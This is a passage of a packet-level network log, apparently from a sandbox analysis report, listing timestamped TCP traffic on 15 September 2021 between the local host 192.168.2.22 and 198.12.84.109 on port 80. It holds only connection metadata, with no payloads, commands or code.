                                              Sep 15, 2021 11:41:58.622602940 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622606039 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622608900 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622612000 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622615099 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622617006 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622620106 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622622013 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622638941 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622643948 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622659922 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622672081 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622679949 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622704029 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622725010 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622747898 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622771978 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622800112 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622827053 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622845888 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622852087 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622876883 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622876883 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622894049 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622896910 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622900009 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622900963 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622904062 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622911930 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622915030 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622917891 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622921944 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622939110 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622951984 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622961998 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622971058 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622983932 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622997046 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623007059 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.623025894 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623030901 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.623044968 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623058081 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.623069048 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623084068 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.623092890 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623111963 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.623128891 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623158932 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.623168945 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623186111 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.623194933 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623212099 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.623223066 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623238087 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.623250008 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623262882 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.623272896 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623289108 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.623300076 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623326063 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.626266003 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.785403013 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.785449028 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.785473108 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.785501003 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.785525084 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.785638094 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.785643101 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.785684109 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.785689116 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.785758018 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.785815001 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.786012888 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.786062002 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.786066055 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.786112070 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.786195993 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.786247969 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.787759066 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.787794113 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.787818909 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.787846088 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.787868977 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.787890911 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.787913084 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.787916899 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.787930965 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.787940025 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.787955999 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.787961960 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.787976027 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.787986040 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.787995100 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.788007975 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.788016081 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.788034916 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.788059950 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.788083076 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.788093090 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.788106918 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.788117886 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.788130045 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.788134098 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.788283110 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.799859047 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.799904108 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.799926043 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.799948931 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.799969912 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.799995899 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800020933 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800043106 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800066948 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800065994 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800091028 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800091982 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800096035 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800107002 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800113916 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800129890 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800137043 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800153017 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800162077 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800165892 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800189972 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800203085 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800215960 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800219059 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800237894 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800251961 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800261021 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800262928 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800283909 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800296068 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800306082 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800309896 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800328970 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800338030 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800352097 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800364971 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800379038 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800379038 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800403118 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800417900 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800425053 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800443888 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800448895 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800458908 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800471067 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800487995 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800493002 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800502062 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800515890 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800517082 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800539970 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800559998 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800565958 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800574064 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800590038 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800602913 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800611973 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800632000 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800636053 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800646067 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800658941 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800678015 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800688028 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800699949 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800703049 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800723076 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800745964 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800749063 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800762892 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800767899 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800776005 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800791025 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800812006 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800815105 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800825119 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800838947 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800851107 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800863981 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800878048 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800889015 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800889969 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800910950 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800920010 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800935030 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800949097 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800957918 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800966024 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800980091 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801002026 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801002979 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801014900 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801026106 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801032066 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801052094 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801074028 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801075935 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801099062 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801100016 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801121950 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801143885 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801143885 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801147938 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801156044 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801167965 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801191092 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801201105 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801206112 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801213980 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801240921 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801256895 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801264048 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801265955 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801273108 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801286936 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801301003 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801311016 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801326036 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801333904 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801342964 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801357031 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801371098 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801382065 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801404953 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801407099 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801414013 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801431894 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801440001 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801456928 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801465034 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801479101 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801505089 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801521063 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801538944 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801543951 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801561117 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801574945 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801619053 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801640987 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801656961 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801666021 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801667929 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801690102 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801697016 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801712036 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801719904 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801733971 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801738024 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801757097 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801764011 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801779032 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801796913 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801801920 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801810980 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801826000 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801834106 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801852942 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801860094 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801876068 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801876068 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801897049 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801908016 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801920891 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801925898 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801944017 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801950932 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801966906 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.801975012 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.801990032 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.802001953 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.802012920 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.802016020 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.802038908 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.802047968 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.802062035 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.802082062 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.802084923 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.802092075 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.802107096 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.802109003 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.802139997 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.802160025 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.802182913 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.802196026 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.802206039 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.802210093 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.802243948 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.957201958 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.957233906 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.957248926 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.957263947 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.957278967 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.957300901 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.957320929 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.957341909 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.957365036 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.957392931 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.957413912 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.957432032 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.957448959 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.957461119 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.957477093 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.957499027 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.957506895 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.957520008 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.957525015 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.957529068 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.957542896 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.957566023 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.957591057 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.957602024 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.957621098 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.957624912 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.957628012 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.957631111 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.959719896 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.959726095 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.959779024 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.959806919 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.959810019 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.959831953 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.959856987 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.959847927 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.959873915 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.959882021 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.959897995 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.959906101 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.959925890 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.959933043 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.959955931 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.959959030 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.959981918 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.960006952 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.960010052 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960026026 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960031986 CEST8049165198.12.84.109192.168.2.22
